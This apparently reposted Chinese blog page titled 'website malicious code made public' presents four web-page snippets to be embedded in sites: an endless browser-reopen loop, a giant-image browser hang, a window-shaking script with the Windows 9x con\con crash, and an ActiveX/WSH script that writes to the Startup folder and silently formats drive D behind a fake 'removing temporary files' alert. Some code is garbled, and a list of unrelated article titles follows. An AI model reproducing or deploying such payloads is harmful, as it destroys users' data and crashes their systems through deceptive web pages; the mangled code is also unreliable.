网站恶意代码公开
来源:互联网 发布:美丽生态历史交易数据 编辑:程序博客网 时间:2024/04/27 14:18
A、死循环代码:
『把下列代码加入到网页中,可达到如上效果』
<img src=javascript:location=“网页的文件名.htm:”>
说明:当含有这段代码的网页被人点击,连接就会不断的打开IE浏览器,直到你的系统资源浪费到0%~只有重新启动才能正常使用!
预防方法:禁用所有的ActiveX控件和插件!因为这是一个ActiveX教本程序~
B、恐怖的大图片:
『把下列代码加入到网页中,可达到如上效果』
<img src= "http://恐怖图片的连接地址" width= "1" height= "100000000000000000000000">
说明:当打开这样的网页,IE会不断的解释试图打开,但由于图片实在太大,超出了其处理能力,所以……
C、地震死机代码:
『把下列代码加入到网页中,可达到如上效果』
<script>
if (window.top.moveBy){
for (i = 1;i < 50; i++){
for (j = 3;j > 0; j--){
window.top.moveBy(0,i);
window.top.moveBy(i,0);
window.top.moveBy(0,-i*2);
window.top.moveBy(-i*2,0);
window.top.moveBy(0,i);
window.top.moveBy(i,0);
}
}
}
</script>
<img src="c:concon">
说明:<img src="c:concon">是windows9x的设备名称解析漏洞!
WINDOWS9x的concon设备名称解析漏洞允许用户进行攻击,倒是98死机。原理:我们知道,CON是DOS下的特殊设备名,不允许做文件名,如果我们在DOS下键入如下命令:copy coldcrysky.txt con,系统会显示coldcrysky.txt的内容,如果换成:copy coldcrysky.txt>con系统会提示文件不能拷贝到文件自身。如果吧con换成LPT或PRN,则输出coldcrysky.txt到打印机。由此可见,CON代表文件本身,如果使用CONCON命令,则意味着系统不断调用文件本身,视系统资源迅速枯竭,连按CTRL+ALT+DEL的机会都没有~
解决办法:
对于9X系统,强烈建议打补丁!!!2000和XP则不会死机~
D、格式化硬盘:(最恐怖的~~~慎用!!!请勿用于非法用途!!!使用后如果有任何负作用,后果自负!与伤寒天空『ColdCrySky』;乱刀留影无关!!!)
scr,Reset();
scr.Path="C:WINDOWSStartMenuPrograms启动startup.htm";
scr.Doc="<object id=`wsh` classid=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`>"
WSH.rUN(`start/m format.com d:/q/autotest/u`);
alert(`IMPORTANT : Windows is removing unused temporary files.`);
scr.write();
说明:当您浏览了网页,会把startup.hta文件写入启动文件夹,并提示WINDOWS正在删除临时文件!实际上是在格式化你的D盘,代码中的:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B对应为:Windows Scripting Host Shell Object。代码中的:WSH全称是:Windows Scripting Host,是微软的一种基于32位系统平台与语言无关的教本解释机制,它使得脚本能在WINDOWS桌面或命令提示符下运行~WSH所对应的程序WScript.exe是一个脚本语言解释器,位于WINDOWS所在文件夹下,所以它可以像执行批处理文件一样执行WSH脚本程序~
解决方法:1)更新您的浏览器,使用最新的浏览器上网!
2)修改msdos.sys,在其中加入:Bootmentu=0命令行,目的是禁用启动菜单。
3)吧format.com改名
4)禁用WSH。具体方法:在win98中,从添加删除程序中点击WINDOWS安装程序,打开附件一项,将WINDOWS SCRIPTING HOST前面的选项去掉,就可以卸载掉WSH了~~~win2000和xp的用户可以在我的电脑-工具菜单-文件夹选项-选择文件类型,找到VBS VBSCRIPT FILE选项,点击删除
- 网站恶意代码公开
- 恶意代码分析相关工具大全以及恶意代码检测网站
- 恶意代码
- 恶意代码
- 网站恶意代码陷阱分析及修复代码
- 通过注入的恶意代码获取网站权限
- 架设公开网站
- IE被某些网站恶意代码修改的问题解决方法心得
- 一次网站被挂恶意代码的查错经历
- 网站被写入恶意代码的主要原因及防范策略
- 网站配色奥秘大公开
- 网站配色奥秘大公开
- 网站配色奥秘大公开
- 网站配色奥秘大公开
- Intel 官方公开资源网站
- 传智播客c/c++公开课学习笔记--C语言与木马恶意代码分析和360安全防护揭秘
- 网站相关信息的公开度
- 经典公开课、好的学习网站
- linux Shell编程入门
- 入侵基于java Struts的JSP网站
- 作图闪烁问题
- MySQL命令行导入备份时会出现“MySQL server has gone away”的错误
- 佳能打印机IP1880,打印提示墨盒收集器已满的解决方法
- 网站恶意代码公开
- 在windows环境下使用emacs + cscope + ecb替代source insight(转)
- 用VC++开发数据库应用程序(四)
- 一些J2ME开发的建议和说明by BlueWanderer
- [转]写的activex控件在IE中弹出安全警告的解决办法~ (可用,强,致敬)
- 剪裁区域和Invalidate函数
- myeclipse5.5GA注册码
- ASP.NET中常用的 20个
- 使用startx无法进入图形界面的问题终于解决